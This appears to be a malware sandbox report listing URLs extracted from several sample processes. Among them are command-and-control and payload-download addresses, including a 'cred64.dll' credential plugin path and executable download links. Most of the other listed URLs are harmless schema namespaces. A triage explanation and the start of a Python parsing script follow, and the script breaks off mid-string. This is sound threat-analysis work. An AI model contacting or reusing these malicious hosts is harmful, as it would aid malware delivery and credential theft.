Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllming
Source: rovwer.exe, 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltE
Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php%J.J
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php)M
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php1J
Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php2142d
Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php27
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php5M
Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php6e2227
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php=J
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.578032701.00000000039D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=1
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=12
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.php
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpIM
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpUM
Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpded
Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpodedt
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpqM
Source: rovwer.exe, 0000000F.00000002.558304896.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://2w3.56.146.174/g84kvj4jck/index.php
Source: 453D.exe, 0000000E.00000002.559563601.00000000007F4000.00000040.00000800.00020000.00000000.sdmp String found in binary or memory: http://2w3ke1f81kujb1ErHJ396kFeJh2wGw.kGPoaj9K4sgjD4aiTghsRtuXhqvbvjv8V7st4eO9BqNG3yXvEhExEI86ToM3BF
Source: 816F.exe, 0000001A.00000002.572240339.000000000255C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.213.50.70
Source: 816F.exe, 0000001A.00000002.564423436.0000000002508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.213.50.70/Wavafursq.jpeg
Source: 816F.exe, 0000001A.00000002.541785354.0000000000889000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.213.50.70/Wavafursq.jpeg&BKl:
Source: 816F.exe, 0000001A.00000002.574232042.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.213.50.704
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.://svedbergbryanthusnonarithmetical.com/v6/down/argq.exe
Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: 86EE.exe, 0000002D.00000003.493388145.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.487579395.0000000001520000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.492244147.0000000001520000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.488488478.0000000001521000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://o36fafs3sn6xou./1148
Source: explorer.exe, 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000000.448635710.0000000000950000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000002.522890770.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002C.00000002.523503696.0000000000810000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000000.454736835.00000000003E0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://o36fafs3sn6xou.com/
Source: explorer.exe, 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000000.448635710.0000000000950000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000002.522890770.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002C.00000002.523503696.0000000000810000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000000.454736835.00000000003E0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://o36fafs3sn6xou.com/Mozilla/5.0
Source: 453D.exe.1.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 453D.exe.1.dr String found in binary or memory: http://s.symcd.com06
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D;
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.572240339.000000000255C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/_z
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exe
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exeCCJ
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exeRC%
Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/wpiq.zip
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/wpiq.zipQQC:
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=60C
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6K
Source: vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6h
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/z/
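Reading the "String found in binary or memory" entries above as IOCs takes some triage: the sandbox prints every byte after a URL up to the next NUL, so one Amadey C2 URL appears as index.php, index.php%J.J, index.phpIM and so on; a partially overwritten string such as http://2w3.56.146.174/... or http://91.://svedberg... is not a host anyone should block; and the dozens of http://schemas.xmlsoap.org, http://docs.oasis-open.org and http://tempuri.org strings in 2B4A.exe are WS-* namespace identifiers present in any .NET/WCF binary, not network indicators. The following script is an added example of that triage, not part of the Joe Sandbox report: it parses report lines of this shape, collapses memory-noise variants onto the shortest observed URL, rejects strings whose host is malformed, and separates framework and PKI (CRL/OCSP) strings from the real indicators. The sample lines are constructed from entries on this page with the long memory-dump identifiers shortened; the allowlists of framework and PKI hosts and the prefix-collapse heuristic are the author's assumptions and should be tuned against your own baseline of clean samples.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: report lines in the same shape as the page above, with the
# memory-dump identifiers shortened. Not the complete list from the report.
SAMPLE_LINES = """\
Source: rovwer.exe, 0000000F.00000002.556830130.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php
Source: rovwer.exe, 0000000F.00000002.555134587.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php%J.J
Source: rovwer.exe, 0000000F.00000002.548035575.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=1
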